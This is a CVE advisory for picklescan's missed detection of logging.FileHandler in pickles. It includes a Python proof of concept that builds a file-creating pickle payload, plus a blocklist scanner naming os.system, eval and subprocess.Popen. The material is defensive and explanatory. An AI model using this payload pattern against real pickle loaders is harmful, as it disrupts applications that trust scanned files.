CVE-2026-56304
Severity: MEDIUM
picklescan - Arbitrary File Creation via logging.FileHandler Deserialization
Title source: CNA description
picklescan before 1.0.1 does not flag pickles that instantiate logging.FileHandler, so a crafted payload passes its RCE blocklist checks. When the cleared pickle is later unpickled, the REDUCE step calls logging.FileHandler(path); with the default delay=False the constructor opens the path in append mode and creates it if it does not exist. An attacker who can supply a pickle file (no authentication or user interaction required) can therefore create arbitrary zero-byte files such as lock files or other filesystem artifacts, potentially causing denial of service or application disruption. The attacker controls the path but not the contents, and the impact lands on whichever application trusts the scan result and loads the file, not on picklescan itself. Upgrade to 1.0.1; a clean scan should still not be treated as permission to unpickle untrusted data.
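The mechanism above, as an added example that is not picklescan's own code: the block builds a pickle whose REDUCE step calls logging.FileHandler(path), shows that loading it creates an empty file, and runs a small opcode-level scanner (standard library only) that extracts every GLOBAL/STACK_GLOBAL reference and checks it against a blocklist. The BLOCKLIST set, the helper names (_FileHandlerPayload, scan_globals, blocked_globals, run_demo) and the sample dict in benign_payload are assumptions made for this example; picklescan's real lists and API differ. The scanner is general: it reports every imported global, not only logging.FileHandler.

```python
"""Added example (not picklescan's own code): build a pickle whose REDUCE step
calls logging.FileHandler(path), show that unpickling it creates a zero-byte
file, and scan the opcode stream for that global before anything is loaded."""
import logging
import os
import pickle
import pickletools
import tempfile

# Illustrative blocklist for this example only; picklescan's real lists are
# longer and differ. The last entry is the one this CVE is about.
BLOCKLIST = {
    "os.system",
    "posix.system",
    "builtins.eval",
    "builtins.exec",
    "subprocess.Popen",
    "logging.FileHandler",
}


class _FileHandlerPayload:
    """Serialises as REDUCE(logging.FileHandler, (path,)): nothing from this
    class is needed on the loading side, only the standard library."""

    def __init__(self, path):
        self.path = path

    def __reduce__(self):
        return (logging.FileHandler, (self.path,))


def build_payload(path, protocol=pickle.HIGHEST_PROTOCOL):
    """Attacker side: a pickle that creates `path` when loaded."""
    return pickle.dumps(_FileHandlerPayload(path), protocol=protocol)


def benign_payload():
    """A harmless pickle (constructed sample: a plain dict) for comparison."""
    return pickle.dumps({"weights": [0.1, 0.2], "epoch": 3})


def scan_globals(data):
    """Return every 'module.name' the pickle resolves via GLOBAL or
    STACK_GLOBAL, without executing it. STACK_GLOBAL pops module and name
    from the stack; the two most recent string pushes are used here, which
    is exact for pickle.dumps output and a close approximation for
    hand-built streams."""
    found = set()
    strings = []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":                 # protocol <= 3: "module name"
            module, name = arg.split(" ", 1)
            found.add(f"{module}.{name}")
        elif op.name == "STACK_GLOBAL":         # protocol >= 4
            if len(strings) < 2:
                raise ValueError("STACK_GLOBAL without module/name strings")
            found.add(f"{strings[-2]}.{strings[-1]}")
        elif op.name in ("SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"):
            strings.append(arg)
    return found


def blocked_globals(data):
    """Sorted list of blocklisted globals the pickle references."""
    return sorted(scan_globals(data) & BLOCKLIST)


def run_demo():
    """Run the attack end to end inside a temporary directory and return
    what the scanner flagged plus what the load actually did on disk."""
    with tempfile.TemporaryDirectory() as d:
        target = os.path.join(d, "app.lock")
        payload = build_payload(target)
        flagged = blocked_globals(payload)
        # What a consumer that trusts a clean scan would do next. The
        # constructor opens the path in append mode (delay=False is the
        # default), so the file exists as soon as REDUCE runs.
        handler = pickle.loads(payload)
        handler.close()
        return {
            "flagged": flagged,
            "created": os.path.exists(target),
            "size": os.path.getsize(target),
        }


if __name__ == "__main__":
    print(run_demo())
```

Running the block prints the demo result: the FileHandler global is flagged, and the target exists with size 0 after the load. The same scan_globals output is what a blocklist-based scanner has to get right: the bypass in this CVE was not an opcode trick but an entry missing from the list, which is why an allowlist of expected globals is the stronger check for pickles whose producer is known.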
References (2)
Vendor Advisory: GHSA-m7j5-r2p5-c39r
https://github.com/mmaitre314/picklescan/security/advisories/GHSA-m7j5-r2p5-c39r
Third Party Advisory: VulnCheck Advisory, "picklescan - Arbitrary File Creation via logging.FileHandler Deserialization"
https://www.vulncheck.com/advisories/picklescan-arbitrary-file-creation-via-logging-filehandler-deserialization
Scores
CVSS v3.1: 6.5 (MEDIUM)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L (Attack Vector: NETWORK; no privileges or user interaction required; low integrity and availability impact, no confidentiality impact)
EPSS: 0.0029 (percentile 20.5%)
CISA SSVC (Vulnrichment)
Exploitation: poc
Automatable: yes
Technical Impact: partial
Details
CWE: CWE-502 (Deserialization of Untrusted Data)
Status: published
Products (3)
mmaitre314/picklescan < 1.0.1 (affected)
picklescan/picklescan < 1.0.1 (affected)
picklescan/picklescan 1.0.1 (first fixed release, per the description)
Published: Jun 20, 2026
Tracked Since: Jun 20, 2026